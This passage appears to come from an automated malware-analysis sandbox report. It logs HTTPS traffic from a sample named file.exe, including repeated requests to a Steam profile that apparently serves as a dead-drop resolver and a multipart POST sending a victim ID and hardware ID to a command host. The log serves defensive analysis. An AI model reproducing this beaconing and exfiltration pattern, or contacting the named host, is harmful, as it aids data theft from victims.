                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: d5 cf c6 9c c7 43 6c 95 5e 8f 3d 41 69 0c 2b 0a 79 37 99 35 de b1 17 10 a0 36 30 e0 3e 69 6a 5d 3b f2 37 7d 7b 26 6b 42 81 6c 09 db 77 49 0d e6 30 8e 10 3a a7 c2 65 bb ff 50 0a c6 e4 d3 9d ec e8 06 c6 88 16 46 f1 ac 0e 43 0f 8b 94 ac f8 a2 20 1a 43 07 1e 33 91 79 1c a3 5e ec eb 9a 2a ba 77 d8 51 50 67 ea ce 3b 18 2c a8 0d 7e 59 86 53 c1 7d 05 fd 27 1e 58 29 65 94 f7 d5 b5 b0 0b 5f 50 6a a1 7e f8 d4 41 a1 63 bc c0 bd 0e 30 3b a0 26 c3 c4 26 35 70 ff 70 71 21 95 6b 64 84 ec 2e 1a 96 0a 63 df cf 5f 2b 87 2b 4d c1 d3 7f 29 d0 2e 94 3b 2b 8f bb d9 5f bc 7f 67 fc b9 f4 70 ef e9 9d b5 4b 75 04 fb 9e 89 9d ab 04 8c 0f 12 28 17 4b 2f 0a fc 06 cb 27 89 3e c2 7a ae c1 9c a0 33 23 7c 2c 92 e6 09 ba 23 53 75 db ad 0e a9 14 5a 8c 7f a9 3a fd cc 12 08 d5 7e 08 f9 d9 4d
                                                                                                                                                                                                                                      Data Ascii: Cl^=Ai+y7560>ij];7}{&kBlwI0:ePFC C3y^*wQPg;,~YS}'X)e_Pj~Ac0;&&5ppq!kd.c_++M).;+_gpKu(K/'>z3#|,#SuZ:~M
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: ac 9a 12 31 3b 07 d7 14 4e 10 26 9e 8d 1a b2 48 14 47 c7 9e 54 23 e6 87 53 bf 90 89 c5 e8 78 c2 29 7c 55 82 1c 3b 7a d8 c4 97 6f 7e ce 57 e5 8c a6 2d 8a cf a3 48 5c 10 f0 f6 dc 15 02 68 a2 4b dd a8 e1 f7 1d 92 48 7c 16 39 13 e5 72 9b 8d 29 b7 77 a5 01 c0 8c ea 7f a1 05 89 5c 2a c2 b0 59 4b c7 1e 99 00 8e 4d 21 61 d2 25 7e 6b 6a b1 44 b5 f2 b5 b4 92 4d fc 57 86 4f b8 48 8c d3 18 a6 13 ee 93 47 0b 95 d5 1c ba 7f 0a ce 62 89 35 00 ee 9a ce 99 c6 c2 76 1c 70 6b 86 7b 42 6d 0c 93 0c d0 66 8f 1d 8c a3 7a ae 0f d3 d5 04 f6 0e 98 58 f9 6b 03 76 a6 bd c3 00 72 68 5f d4 8d 72 f4 cd 28 91 30 13 d3 51 1e 96 a6 33 2e 13 ad 25 43 4d 59 41 3e f7 0b 6e 34 c3 e2 4f 5d 42 3c 2d 76 3e 35 b5 31 eb 86 99 0a 9d 84 76 66 2d 93 79 4b a3 8f 5f 4b 80 68 39 2f a4 b1 f9 34 c3 e3 34
                                                                                                                                                                                                                                      Data Ascii: 1;N&HGT#Sx)|U;zo~W-H\hKH|9r)w\*YKM!a%~kjDMWOHGb5vpk{BmfzXkvrh_r(0Q3.%CMYA>n4O]B<-v>51vf-yK_Kh9/44
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: 55 b4 7d fa 9c f6 87 13 b9 63 f1 5b 39 41 7b a2 d2 38 d0 f7 2f 2b 85 11 10 12 50 1a ff bd 46 b6 fc f2 ee 31 88 cb ec 39 3d 1f f8 98 88 d2 a1 cd ad 69 d9 1f 53 db 61 99 72 51 c1 92 9c b6 d6 95 b5 b1 1c 08 75 33 a5 7b cf 7a 51 09 e4 41 84 eb 2e de b2 38 02 c9 27 00 fd c2 35 1c b9 08 08 35 11 04 f7 43 1d b0 ba 0c b1 81 26 3f 65 d3 cb 1d e0 be 02 0f 86 25 bf ab 3c 71 17 2d b8 53 2c 4a 28 7c d4 49 f6 4b ce e3 e6 b8 2d be 7b 35 d5 ac 72 f3 83 be 57 73 33 18 1e d3 f6 a9 71 bc d5 77 ac 00 e1 c2 ce 19 c0 fe 7e 4f 15 01 d2 8c 6b 0f 61 f8 f3 d5 10 d0 78 7e c7 dd 56 c1 b4 5b 66 2d 33 f6 78 73 b6 cf 8e 7a d3 f8 36 44 d4 4e 93 24 6d 67 63 b8 6e cd eb fb 10 f7 14 ac 92 c1 c2 ef ac 02 a8 fd 57 2f 51 04 f0 48 30 cc 60 c3 86 53 99 63 1c 3b 32 be 76 d2 b1 b7 84 30 c2 9f ff
                                                                                                                                                                                                                                      Data Ascii: U}c[9A{8/+PF19=iSarQu3{zQA.8'55C&?e%<q-S,J(|IK-{5rWs3qw~Okax~V[f-3xsz6DN$mgcnW/QH0`Sc;2v0
                                                                                                                                                                                                                                      2025-03-13 15:40:16 UTC1369INData Raw: ef 65 91 23 1c 12 7b c9 0c 43 62 28 a1 c2 f1 32 71 3d fa 0a 8e 3a dc f1 4c d5 5e 37 12 a7 cb 39 e3 03 5f 38 ec 5b 6d cf 21 1a 91 7e 55 89 66 91 06 3c 19 02 fc 2e 07 52 f6 ae 27 f9 9f 2a 6e 47 79 82 c3 53 88 5b c7 fd b1 01 93 88 05 b9 06 f5 48 0c d5 d0 e0 cb 4d 0c 7c a4 f8 e3 64 8c de 0c 7b 0c 6f a6 16 3f aa c0 b4 28 64 b4 90 03 56 9c 36 94 90 9c a2 30 77 73 33 9d 3e d7 33 ab 20 67 58 f6 89 36 75 67 ab 41 dc 9b 6f 6e c2 4d 8e 3d 40 23 89 f4 49 4e fc df 4b 62 d7 3f 1e 7a f1 0d b5 0c 48 f5 64 57 0b ed e9 d7 df 91 33 86 75 33 15 9a 02 8b 78 45 30 66 7d ea 98 61 7d be ee 35 5d eb e2 e7 5c e7 20 87 d2 7c 94 b7 ce 53 07 c6 ba 76 63 e5 0a 97 79 2a 28 4c b8 bd ea 43 ed e9 71 37 1e 9f 9c 0a b9 fa 9f 69 78 d9 af cc 87 fe 50 dd 19 24 07 ff 10 45 35 9e c6 7b 93 a2 9a
                                                                                                                                                                                                                                      Data Ascii: e#{Cb(2q=:L^79_8[m!~Uf<.R'*nGyS[HM|d{o?(dV60ws3>3 gX6ugAonM=@#INKb?zHdW3u3xE0f}a}5]\ |Svcy*(LCq7ixP$E5{


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.849684104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:19 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-03-13 15:40:20 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:20 GMT
                                                                                                                                                                                                                                      Content-Length: 36122
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=e22140c5afaba0083d7f4fff; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:20 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:20 UTC16384INData Raw: 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d
                                                                                                                                                                                                                                      Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector" data-
                                                                                                                                                                                                                                      2025-03-13 15:40:20 UTC3762INData Raw: 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65 6c 6c 69 70 73 69 73 22 3e 0a
                                                                                                                                                                                                                                      Data Ascii: id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name ellipsis">
                                                                                                                                                                                                                                      2025-03-13 15:40:20 UTC1566INData Raw: 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63
                                                                                                                                                                                                                                      Data Ascii: onsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.steamstatic.c


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.849685188.114.97.34436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:22 UTC271OUTPOST /bSHsyZD HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=gDVu0p986
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 14490
                                                                                                                                                                                                                                      Host: guntac.bet
                                                                                                                                                                                                                                      2025-03-13 15:40:22 UTC14490OUTData Raw: 2d 2d 67 44 56 75 30 70 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 0d 0a 2d 2d 67 44 56 75 30 70 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 67 44 56 75 30 70 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 44 30 46 39 39 45 38 36 34 42 45 37 41 31
                                                                                                                                                                                                                                      Data Ascii: --gDVu0p986Content-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--gDVu0p986Content-Disposition: form-data; name="pid"2--gDVu0p986Content-Disposition: form-data; name="hwid"02D0F99E864BE7A1
                                                                                                                                                                                                                                      2025-03-13 15:40:23 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sl0PTCKoVZG5n6ps%2Fu6c%2FeZs%2FXrzdHYoD%2FBWvUeQHi6xBpnV9qMGVn1MOP6iD70Se1v0AVFxoifu%2FW0uE7LV7RGzAI%2FHET7UgTGJJ1rVlbJxtfTK37%2FirMg3ktoF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 91fca1200a996e66-DFW
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=39634&min_rtt=37693&rtt_var=13966&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2821&recv_bytes=15419&delivery_rate=62985&cwnd=32&unsent_bytes=0&cid=91b5ee9fb1337a61&ts=1116&x=0"
                                                                                                                                                                                                                                      2025-03-13 15:40:23 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 30 2e 31 37 33 2e 32 30 30 2e 31 37 33 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 70.173.200.173"}}
                                                                                                                                                                                                                                      2025-03-13 15:40:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.849686104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:25 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-03-13 15:40:26 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:25 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=80b4cd3709ae942414d74a25; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:26 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:26 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.849688104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:28 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-03-13 15:40:29 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 13 Mar 2025 15:40:28 GMT
                                                                                                                                                                                                                                      Content-Length: 26508
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=8c02966154117fde8952c494; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C38d449461b3bc36ddf11c3d8a68204d7; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2025-03-13 15:40:29 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                      2025-03-13 15:40:29 UTC12098INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.849693104.73.234.1024436392C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-03-13 15:40:31 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Host: steamcommunity.com
